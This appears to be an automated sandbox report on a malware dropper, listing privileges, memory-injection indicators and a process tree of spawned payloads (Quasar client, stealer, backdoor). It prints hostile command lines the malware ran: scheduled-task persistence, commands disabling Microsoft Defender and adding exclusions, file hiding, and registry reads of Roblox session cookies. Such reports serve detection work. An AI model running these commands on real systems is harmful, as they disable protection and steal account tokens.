Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\SubDir\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1808 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe
PID 1808 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe
PID 1808 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe
PID 2920 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe
PID 2920 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe
PID 2920 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe
PID 1456 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
PID 1456 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
PID 1456 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
PID 1808 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 2844 wrote to memory of 3048 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\Files\client.exe
PID 2844 wrote to memory of 3048 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\Files\client.exe
PID 3048 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\Files\client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3048 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\Files\client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3048 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\Files\client.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 3048 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\Files\client.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 3048 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\Files\client.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 1352 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe C:\Windows\svchost.com
PID 1352 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe C:\Windows\svchost.com
PID 1352 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe C:\Windows\svchost.com
PID 4584 wrote to memory of 3104 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe
PID 4584 wrote to memory of 3104 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe
PID 3104 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3104 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1808 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 2792 wrote to memory of 404 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe
PID 2792 wrote to memory of 404 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe
PID 3104 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 3104 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 3104 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 1988 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe C:\Windows\svchost.com
PID 1988 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe C:\Windows\svchost.com
PID 1988 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe C:\Windows\svchost.com
PID 2816 wrote to memory of 396 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe
PID 2816 wrote to memory of 396 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe
PID 404 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe C:\Windows\SYSTEM32\schtasks.exe
PID 404 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe C:\Windows\SYSTEM32\schtasks.exe
PID 404 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe C:\Windows\system32\SubDir\Client.exe
PID 404 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe C:\Windows\system32\SubDir\Client.exe
PID 396 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 396 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 396 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 396 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 3020 wrote to memory of 4420 N/A C:\Windows\system32\SubDir\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3020 wrote to memory of 4420 N/A C:\Windows\system32\SubDir\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1992 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1992 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1808 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1692 wrote to memory of 1792 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\Files\winn.exe
PID 1692 wrote to memory of 1792 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\Files\winn.exe
PID 1808 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 4540 wrote to memory of 1564 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE
PID 4540 wrote to memory of 1564 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE
PID 1808 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe

"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"

C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe

"C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe"

C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe

"C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\client.exe"

C:\Users\Admin\AppData\Local\Temp\Files\client.exe

C:\Users\Admin\AppData\Local\Temp\Files\client.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe"

C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe

C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe"

C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe

C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe"

C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe

C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "java updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe" /rl HIGHEST /f

C:\Windows\system32\SubDir\Client.exe

"C:\Windows\system32\SubDir\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "java updater" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\winn.exe"

C:\Users\Admin\AppData\Local\Temp\Files\winn.exe

C:\Users\Admin\AppData\Local\Temp\Files\winn.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE"

C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE

C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"

C:\Users\Admin\AppData\Local\Temp\Files\soft.exe

C:\Users\Admin\AppData\Local\Temp\Files\soft.exe

C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE

C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"

C:\Users\Admin\AppData\Local\Temp\Files\random.exe

C:\Users\Admin\AppData\Local\Temp\Files\random.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\m.exe"

C:\Users\Admin\AppData\Local\Temp\Files\m.exe

C:\Users\Admin\AppData\Local\Temp\Files\m.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\sysnldcvmr.exe

C:\Windows\sysnldcvmr.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE"

C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE

C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe"

C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe

C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"

C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe

C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe

C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe

"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe" -service -lunch

C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe

"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\Files\winn.exe' -Force

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\2946613613.exe

C:\Users\Admin\AppData\Local\Temp\2946613613.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c schtasks /delete /f /tn Windows Upgrade Manager

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\SysWOW64\reg.exe

reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /delete /f /tn Windows Upgrade Manager

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\SYSTEM32\rundll32.exe

rundll32.exe "C:\ProgramData\AMMYY\aa_nts.dll",run

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\248483651.exe

C:\Users\Admin\AppData\Local\Temp\248483651.exe

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\SysWOW64\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SysWOW64\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE'

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE"

C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE

C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe"

C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe

C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe

C:\Users\Admin\AppData\Local\Temp\322341857.exe

C:\Users\Admin\AppData\Local\Temp\322341857.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe

"C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\2767925072.exe

C:\Users\Admin\AppData\Local\Temp\2767925072.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\2928124777.exe

C:\Users\Admin\AppData\Local\Temp\2928124777.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE"

C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE

C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe"

C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe

C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

